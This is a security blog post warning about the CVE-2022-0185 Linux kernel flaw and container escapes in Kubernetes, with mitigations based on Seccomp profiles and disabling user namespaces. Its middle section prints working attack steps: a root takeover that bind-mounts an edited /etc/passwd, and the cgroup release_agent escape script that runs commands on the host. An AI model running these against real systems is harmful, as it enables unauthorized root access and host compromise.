High risk! Warning: a new Kubernetes container escape vulnerability

Posted by gypmaster on Thu, 03 Mar 2022 05:16:15 +0100

Author: michelangela young, KubeSphere evangelist and heavily addicted cloud native enthusiast

On January 18, 2022, Linux maintainers and vendors found a heap buffer overflow vulnerability in the legacy_parse_param function of the file system context code in the Linux kernel (5.1-rc1 and later). It is tracked as CVE-2022-0185 and is a high-risk vulnerability with a severity score of 7.8.

The vulnerability allows out-of-bounds writes in kernel memory. Using it, an unprivileged attacker can bypass the restrictions of any Linux namespace and escalate to root. For example, an attacker who has broken into one of your containers can escape from the container and gain higher privileges on the host.

The vulnerability was introduced in Linux kernel 5.1-rc1 in March 2019. The patch released on January 18 fixes the problem, and all Linux users are advised to download and install the latest kernel version.

Vulnerability details

The vulnerability is caused by an integer underflow in the legacy_parse_param function of the file system context code (fs/fs_context.c). The file system context is used to create superblocks for mounting and remounting file systems. A superblock records the characteristics of a file system, such as block and file sizes, as well as any storage blocks.

By sending more than 4095 bytes of input to the legacy_parse_param function, an attacker can bypass the input length check, causing an out-of-bounds write and triggering the vulnerability. The attacker can use this to write malicious data into other parts of memory, which can crash the system or allow arbitrary code execution to escalate privileges.
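
A minimal sketch of why the length check can be bypassed. It assumes the check has the shape "len > PAGE_SIZE - 2 - size" with an unsigned size, as described in public write-ups of this CVE; the function and variable names below are illustrative, not kernel code. Python integers never wrap, so 64-bit unsigned arithmetic is emulated with a mask.

```python
PAGE_SIZE = 4096
U64_MASK = (1 << 64) - 1  # emulate a 64-bit unsigned size_t


def check_rejects(size: int, length: int) -> bool:
    """Return True if the (assumed) length check would reject the new input.

    size   -- bytes already stored in the legacy parameter buffer
    length -- bytes of the new parameter about to be appended
    """
    # Unsigned subtraction wraps around instead of going negative.
    remaining = (PAGE_SIZE - 2 - size) & U64_MASK
    return length > remaining


# Buffer nearly full but below the threshold: the check works as intended.
print(check_rejects(4000, 200))  # True: input rejected
# Once size reaches 4095, PAGE_SIZE - 2 - size underflows to a huge value,
# so the check accepts input that no longer fits in the page.
print(check_rejects(4095, 200))  # False: input accepted
```

The second call is the interesting one: the subtraction yields -1, which as an unsigned value is larger than any realistic input length, so nothing is rejected any more.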

The input data of the legacy_parse_param function is supplied through the fsconfig system call, which configures the creation context of a file system (such as the superblock of an ext4 file system).

// Use the fsconfig system call to add a NULL terminated string pointed to by val
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

To use the fsconfig system call, an unprivileged user must have at least the CAP_SYS_ADMIN capability in their current namespace. This means that being able to enter another namespace in which the user holds this capability is enough to exploit the vulnerability.

If an unprivileged user does not have the CAP_SYS_ADMIN capability, an attacker can obtain it through an unshare(CLONE_NEWNS|CLONE_NEWUSER) system call. The unshare system call lets the caller create new namespaces (here a mount namespace and a user namespace) and thereby gain the capabilities needed for further attacks inside them. This matters a great deal in the Kubernetes and container world, which relies on Linux namespaces to isolate Pods. An attacker can take advantage of it in a container escape attack. Once successful, the attacker gains full control of the host operating system and all containers running on it, can go on to attack other machines in the internal network segment, and can even deploy malicious containers in the Kubernetes cluster.
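
As a rough sketch, the same system call can be issued from Python through ctypes. The flag values are the ones defined in the Linux headers; the helper name try_unshare is made up for this illustration. Note that a successful call moves the calling process into new namespaces, so only run it in a throwaway shell or container.

```python
import ctypes
import os

# Flag values from <linux/sched.h>.
CLONE_NEWNS = 0x00020000    # new mount namespace
CLONE_NEWUSER = 0x10000000  # new user namespace
FLAGS = CLONE_NEWNS | CLONE_NEWUSER


def try_unshare(flags: int = FLAGS) -> str:
    """Attempt unshare(flags) for the calling process and report the result.

    Returns "ok" on success, otherwise the error text for errno
    (for example when a seccomp filter or a sysctl blocks the call).
    """
    libc = ctypes.CDLL(None, use_errno=True)
    if libc.unshare(flags) == 0:
        return "ok"
    return os.strerror(ctypes.get_errno())
```

Calling print(try_unshare()) in a test process reports whether the environment lets an unprivileged process create these namespaces at all.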

On January 25, the research team that discovered the vulnerability released the exploit code and a proof of concept on GitHub.


Docker and other container runtimes apply a Seccomp profile by default, which prevents processes in the container from using dangerous system calls and so protects Linux namespace boundaries.

Seccomp (short for secure computing mode) was introduced into the Linux kernel in version 2.6.12 (March 8, 2005). It limits the system calls available to a process to four: read, write, _exit, and sigreturn. This original mode is an allowlist mode. In it, apart from already opened file descriptors and the four allowed system calls, any attempt to make another system call causes the kernel to terminate the process with SIGKILL or SIGSYS.

However, by default Kubernetes does not use any Seccomp or AppArmor/SELinux profile to restrict the system calls of a Pod, which is very dangerous. Processes in the Pod can freely make dangerous system calls and wait for an opportunity to obtain the privileges they need (such as CAP_SYS_ADMIN) for further attacks.
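
One way to see whether a process is actually running under a Seccomp filter is the Seccomp field in /proc/<pid>/status (0 = disabled, 1 = strict, 2 = filter). The following is a small sketch of reading that field; the function name and the sample text are made up for illustration.

```python
def seccomp_mode(status_text: str) -> str:
    """Map the Seccomp field of /proc/<pid>/status to a readable name."""
    names = {"0": "disabled", "1": "strict", "2": "filter"}
    for line in status_text.splitlines():
        # Match "Seccomp:" exactly, not "Seccomp_filters:".
        if line.startswith("Seccomp:"):
            value = line.split(":", 1)[1].strip()
            return names.get(value, "unknown")
    return "unknown"


# Made-up excerpt in the format of /proc/<pid>/status.
sample = "Name:\tbash\nSeccomp:\t0\nSeccomp_filters:\t0\n"
print(seccomp_mode(sample))  # disabled
```

Inside a container, seccomp_mode(open("/proc/self/status").read()) gives the mode of the current process.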

Let's look at a Docker example. In a standard Docker environment the unshare command cannot be used, because Docker's Seccomp filter blocks the system call that this command relies on.

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

Take another look at Kubernetes' Pod:

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

You can see that the root user in the Pod does not have the CAP_SYS_ADMIN capability, but we can obtain it through the unshare command.

root@test:/# unshare -Urm
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh
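
The capability lists printed by pscap correspond to a bitmask (the CapEff field in /proc/<pid>/status). As a hedged sketch, the helper below converts between names and bits for capabilities 0 to 31, using the numbering of the Linux capability header; the helper names are made up, and newer capabilities above bit 31 are left out for brevity.

```python
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap",
]  # capabilities 0..31, in the order of <linux/capability.h>


def decode_caps(mask: int) -> list:
    """Return the names of the capabilities whose bits are set in mask."""
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def encode_caps(names) -> int:
    """Return the bitmask for a list of capability names."""
    return sum(1 << CAP_NAMES.index(name) for name in names)


# The capability list shown for bash (PID 1) in the Pod above.
pod_caps = ["chown", "dac_override", "fowner", "fsetid", "kill", "setgid",
            "setuid", "setpcap", "net_bind_service", "net_raw", "sys_chroot",
            "mknod", "audit_write", "setfcap"]
mask = encode_caps(pod_caps)
print(hex(mask))                         # 0xa80425fb
print("sys_admin" in decode_caps(mask))  # False
```

The shell started by unshare is listed as "full", meaning every capability bit is set inside the new user namespace, including bit 21 (sys_admin).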

So what can you do with CAP_SYS_ADMIN? Here are two examples that show how CAP_SYS_ADMIN can be used to penetrate a system.

Escalating an ordinary user to root!

The following steps promote an ordinary user on the host directly to the root user.

First give Python 3 the CAP_SYS_ADMIN capability (note that this cannot be done on a symbolic link, only on the original file).

$ which python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

Create a normal user.

$ useradd test -d /home/test -m

Then switch to the ordinary user and enter the user's home directory.

$ su test
$ cd ~

Copy /etc/passwd to the current directory and change the password of the root user to "password".

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password

# Change root:x in the first line to root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
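
The manual edit of the copied passwd file can also be scripted. This is only a sketch: the helper name is made up, the sample lines are illustrative, and HASH stands in for whatever the openssl passwd command printed.

```python
def set_password_field(passwd_text: str, user: str, pw_hash: str) -> str:
    """Return passwd_text with the second field of user's entry replaced."""
    out = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if fields[0] == user and len(fields) >= 2:
            fields[1] = pw_hash  # the "x" placeholder becomes the hash
        out.append(":".join(fields))
    return "\n".join(out) + "\n"


# Illustrative two-line passwd file; HASH is a placeholder, not a real hash.
sample = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)
print(set_password_field(sample, "root", "HASH"), end="")
```

Only the entry whose first field matches the user name is changed; all other lines pass through untouched.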

Mount the modified passwd file over /etc/passwd.

# cat mount-passwd.py
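import ctypes
import os

# Load libc with errno support so a failed mount() can be reported.
libc = ctypes.CDLL("libc.so.6", use_errno=True)
libc.mount.argtypes = (ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p,
                       ctypes.c_ulong, ctypes.c_char_p)
MS_BIND = 4096  # bind mount flag from <sys/mount.h>
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
# Bind-mount the modified copy over /etc/passwd (needs CAP_SYS_ADMIN).
if libc.mount(source, target, filesystemtype, mountflags, options) != 0:
    err = ctypes.get_errno()
    raise OSError(err, os.strerror(err))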
$ python3 mount-passwd.py

Now comes the moment to witness the miracle: switch directly to the root user and enter the password "password".

$ su root

Amazingly, we have switched to root...

Let's check whether we really have root permissions:

$ find / -name "*flag*" 2>/dev/null

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

Well, that's right.

Finally, remember to unmount /etc/passwd.

$ umount /etc/passwd

So, system reboot engineers, hurry up and check whether any of the ordinary user accounts you have handed out carry the CAP_SYS_ADMIN capability.

Viewing all host processes from inside a container!

Here is another example: listing all the processes running on the host from inside a container.

We don't need the --privileged flag to run a privileged container; that would be boring.

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

Next, execute the following commands in the container. The net effect is to run the ps aux command on the host and save its output to the /output file in the container.

# Mounts the RDMA cgroup controller and creates a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# it's because your setup doesn't have the RDMA cgroup controller; try changing rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

Finally, you can see all the processes running on the host from inside the container:

root@0c84f7587629:/# cat /output
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]

I won't explain the specific meaning of these commands. If you are interested, you can study them with the help of the comments.
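
As one illustration, the host_path step of the script (the sed command) pulls the upperdir option of the container's OverlayFS root mount out of /etc/mtab. The sketch below mirrors that step in Python. It is slightly stricter than the sed expression, since it only looks at the overlay mount on /, and the sample line with its paths is made up.

```python
import re


def overlay_upperdir(mtab_text: str):
    """Return the upperdir of the overlay mount on "/", or None if absent."""
    for line in mtab_text.splitlines():
        fields = line.split()
        # mtab fields: device, mount point, fs type, options, dump, pass
        if len(fields) >= 4 and fields[1] == "/" and fields[2] == "overlay":
            match = re.search(r"upperdir=([^,]*)", fields[3])
            if match:
                return match.group(1)
    return None


# Made-up mtab line in the usual format; the directory names are illustrative.
sample = (
    "overlay / overlay rw,relatime,"
    "lowerdir=/var/lib/docker/overlay2/l/AAA,"
    "upperdir=/var/lib/docker/overlay2/abc/diff,"
    "workdir=/var/lib/docker/overlay2/abc/work 0 0\n"
)
print(overlay_upperdir(sample))  # /var/lib/docker/overlay2/abc/diff
```

This path is where the container's writable layer lives on the host, which is why a file written to /cmd in the container can be referenced by the host through host_path.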

To be sure, the CAP_SYS_ADMIN capability gives attackers more possibilities, whether on the host or in a container, and especially in container environments. If we cannot upgrade the kernel for reasons beyond our control, we need to find other solutions.


Container layer

Since v1.22, Kubernetes can use SecurityContext to add the default Seccomp or AppArmor profile to resource objects such as Pods, Deployments, StatefulSets, and DaemonSets in order to protect them. Although this feature is currently in Alpha, users can add their own Seccomp or AppArmor profile and define it in SecurityContext. For example:

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

After creating the Pod, try to use unshare to get the CAP_SYS_ADMIN capability.

$ kubectl exec -it protected -- bash
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

The output shows that the unshare system call is successfully blocked, so the attacker cannot use it to obtain this capability.
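
To audit existing workloads for this setting, something like the following sketch could be used. It assumes the Pod manifest has already been parsed into a Python dict (for example from YAML or JSON); the function name is made up, while securityContext.seccompProfile.type is the field used in the manifest above.

```python
def containers_without_seccomp(pod: dict) -> list:
    """Return the names of containers that run without a Seccomp profile.

    A container-level seccompProfile overrides the Pod-level one.
    """
    spec = pod.get("spec", {})
    pod_type = (spec.get("securityContext", {})
                    .get("seccompProfile", {})
                    .get("type"))
    missing = []
    for container in spec.get("containers", []):
        profile = (container.get("securityContext", {})
                            .get("seccompProfile", {})
                            .get("type", pod_type))
        if profile in (None, "Unconfined"):
            missing.append(container["name"])
    return missing


protected = {"spec": {"containers": [{
    "name": "protected",
    "securityContext": {"seccompProfile": {"type": "RuntimeDefault"}},
}]}}
plain = {"spec": {"containers": [{"name": "test", "image": "ubuntu"}]}}

print(containers_without_seccomp(protected))  # []
print(containers_without_seccomp(plain))      # ['test']
```

An empty result only says that a profile is requested in the manifest; whether the runtime's default profile blocks unshare still has to be verified as shown above.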

Host level

Another solution is to prohibit unprivileged users from using user namespaces at the host level, which does not require restarting the system. For example, on Ubuntu you only need to run the following two commands; the setting takes effect immediately and also persists after a reboot.

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

If it is a Red Hat system, you can execute the following commands to achieve the same effect.

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
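
To confirm that the setting is active, the two sysctl values can be read back from /proc/sys. This is a small sketch with made-up helper names; a value of None means the sysctl does not exist on the running kernel.

```python
from pathlib import Path

SYSCTL_FILES = {
    "kernel.unprivileged_userns_clone": "/proc/sys/kernel/unprivileged_userns_clone",
    "user.max_user_namespaces": "/proc/sys/user/max_user_namespaces",
}


def read_sysctl(path: str):
    """Return the integer value stored at path, or None if unavailable."""
    try:
        return int(Path(path).read_text().strip())
    except (OSError, ValueError):
        return None


def unprivileged_userns_blocked(values: dict) -> bool:
    """True if either sysctl from the commands above is set to 0."""
    return (values.get("kernel.unprivileged_userns_clone") == 0
            or values.get("user.max_user_namespaces") == 0)


current = {name: read_sysctl(path) for name, path in SYSCTL_FILES.items()}
print(current, unprivileged_userns_blocked(current))
```

On a host where neither value is 0, the second printed item is False and unprivileged user namespaces are still available.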

To summarize the recommendations for handling this vulnerability:

  • If your environment can tolerate patching the kernel or restarting the system, it is best to patch or upgrade the kernel.
  • Minimize the use of privileged containers that have access to CAP_SYS_ADMIN.
  • For unprivileged containers, make sure a Seccomp filter blocks their calls to unshare to reduce the risk. Docker does this by default; Kubernetes needs additional configuration.
  • Going forward, Seccomp profiles can be enabled for all workloads in a Kubernetes cluster. At present this feature is still in Alpha and must be enabled through a feature gate.
  • At the host level, prohibit unprivileged users from using user namespaces.

Final words

Container environments are complex, especially distributed scheduling platforms like Kubernetes. Every component has its own life cycle and attack surface, so security risks are easily exposed. Container cluster administrators must pay attention to security in every detail. In most cases the security of a container depends on the security of the Linux kernel, so we need to keep watching for security issues and apply the corresponding fixes as soon as possible.
